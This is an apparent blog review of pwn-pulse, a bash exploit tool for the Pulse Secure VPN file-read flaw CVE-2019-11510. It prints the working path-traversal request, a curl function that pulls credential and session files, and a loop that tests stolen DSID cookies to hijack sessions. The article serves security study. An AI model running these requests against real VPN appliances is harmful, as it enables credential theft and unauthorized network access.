Inside pwn-pulse: A Surgical Shell Script for Pulse Secure VPN Exploitation

Hook

While most security tools chase complexity with Python frameworks and compiled binaries, one of the most effective VPN exploitation tools ever released fits in a single shell script you could read during a coffee break.

Context

In April 2019, security researcher Orange Tsai disclosed a pre-authentication arbitrary file read vulnerability in Pulse Connect Secure SSL VPN devices that would become one of the most consequential enterprise security incidents of that year. CVE-2019-11510 allowed unauthenticated attackers to read arbitrary files from affected devices simply by crafting malicious HTTP requests to specific endpoints. The vulnerability wasn't just theoretical—it exposed plaintext credentials, session tokens, and private keys on thousands of internet-facing VPN concentrators protecting corporate networks.

The impact was immediate and severe. Pulse Secure VPNs were deployed across Fortune 500 companies, government agencies, and critical infrastructure. Within weeks of the disclosure, mass scanning campaigns began. By the time patches rolled out in August 2019, attackers had already compromised numerous high-value targets. BishopFox's pwn-pulse emerged as a practical exploitation tool for security professionals who needed to rapidly assess their organization's exposure. Rather than building a complex framework, they created a focused bash script that did one thing exceptionally well: extract every piece of valuable data from a vulnerable Pulse Secure instance and identify which sessions could be immediately hijacked.

Technical Insight

The brilliance of pwn-pulse lies in its surgical approach to exploitation. The tool doesn't attempt to be a Swiss Army knife—it weaponizes CVE-2019-11510 through a carefully orchestrated sequence of file reads followed by intelligent parsing. The vulnerability itself stems from improper path sanitization in the Pulse Secure web interface. By sending requests to /dana-na/../dana/html5acc/guacamole/../../../../../../etc/passwd, attackers could traverse directory structures and read arbitrary files. Pwn-pulse weaponizes this by targeting specific high-value files that Pulse Secure stores in predictable locations.

The core exploitation logic revolves around a simple but effective curl-based file download function:

get_file() {
    local file=$1
    local output=$2
    curl -sk "https://${TARGET}/dana-na/../dana/html5acc/guacamole/../../../../../../${file}" \
         -o "${output}" 2>/dev/null
    
    if [ -s "${output}" ]; then
        echo "[+] Downloaded ${file}"
        return 0
    else
        echo "[-] Failed to download ${file}"
        return 1
    fi
}

This function demonstrates the vulnerability perfectly: the path traversal sequence ../dana/html5acc/guacamole/../../../../../../ breaks out of the web root, allowing access to the entire filesystem. The script then systematically targets files containing credentials, configuration data, and session information. The primary targets include /data/runtime/mtmp/system, /data/runtime/mtmp/lmdb/dataa/data.mdb, and /data/runtime/mtmp/lmdb/randomVal/data.mdb—files that contain cached authentication data, LDAP credentials, and active session tokens.

What separates pwn-pulse from a basic proof-of-concept is its parsing intelligence. After downloading target files, the script employs grep patterns and text processing to extract actionable intelligence. For session cookies, it searches for specific markers that indicate active sessions:

grep -aoP 'DSID=[a-f0-9]{32}' lmdb_data.mdb | sort -u | while read session; do
    echo "[*] Testing session: ${session}"
    response=$(curl -sk -o /dev/null -w "%{http_code}" \
              -H "Cookie: ${session}" \
              "https://${TARGET}/dana/home/index.cgi")
    
    if [ "${response}" == "200" ]; then
        echo "[+] VALID SESSION: ${session}"
        echo "${session}" >> valid_sessions.txt
    fi
done

This session validation loop transforms raw data extraction into an immediately exploitable attack vector. By testing each extracted DSID cookie against the Pulse Secure login portal, the tool identifies active sessions that an attacker could hijack without needing credentials. This is particularly devastating because VPN sessions often have extended timeouts, meaning a session extracted hours after initial authentication might still grant full network access.

The tool's architecture also reveals thoughtful error handling and output management. Rather than dumping everything to stdout, pwn-pulse creates an organized directory structure for each target, storing raw files, parsed credentials, and validated sessions in separate files. This organization proves invaluable during actual penetration tests where you might be assessing dozens of targets and need to quickly identify which systems yielded exploitable results.

One particularly clever aspect is how the script handles binary data in the LMDB database files. These files contain a mix of binary data and plaintext strings. Instead of attempting complex binary parsing, pwn-pulse uses strings and grep to extract readable data, then applies regex patterns to identify credentials, API keys, and session tokens. This approach isn't elegant, but it's remarkably effective and requires no dependencies beyond standard Unix utilities available on any penetration testing distribution.

Gotcha

The most obvious limitation is temporal: CVE-2019-11510 was patched in August 2019, making this tool largely historical for most modern infrastructure. Any organization running Pulse Connect Secure versions vulnerable to this issue has much larger security problems than a single unpatched VPN. During penetration tests, you'll find this tool useful primarily when assessing legacy systems, isolated networks with poor patch management, or conducting red team exercises that simulate advanced persistent threats who maintain exploitation capabilities for years-old vulnerabilities.

The shell script implementation, while admirably portable, introduces practical limitations that become apparent at scale. The script processes files synchronously and relies heavily on text processing utilities that weren't designed for binary format parsing. When targeting Pulse Secure instances with large session databases or extensive configuration files, you'll encounter significant performance degradation. The grep-based parsing also produces false positives—random binary sequences occasionally match credential patterns, requiring manual verification of results. Additionally, the tool provides no rate limiting or request throttling, which can trigger intrusion detection systems or cause service disruptions if you're not careful. For large-scale assessment campaigns across hundreds of potential targets, you'd be better served by the Metasploit module or custom tooling with concurrent execution and more robust error handling.

Verdict

Use if: You're conducting authorized penetration tests against organizations with documented poor patch management, need a lightweight exploitation tool that runs on resource-constrained systems without Python or Ruby dependencies, or want to understand the practical mechanics of path traversal exploitation in enterprise VPN appliances. This tool excels in scenarios where you need rapid credential harvesting from a small number of known-vulnerable targets and want immediately interpretable results without complex framework configuration. Skip if: Your assessment scope involves modern, well-maintained infrastructure where post-2019 patches are applied, you need to scan large IP ranges for vulnerable systems (use Nuclei or Metasploit's scanner instead), or you require comprehensive post-exploitation capabilities beyond credential theft and session hijacking. Also skip this if you're looking for a current threat—by 2024, CVE-2019-11510 represents ancient history in vulnerability terms, and its presence indicates systemic security failures beyond what a single exploit tool can address.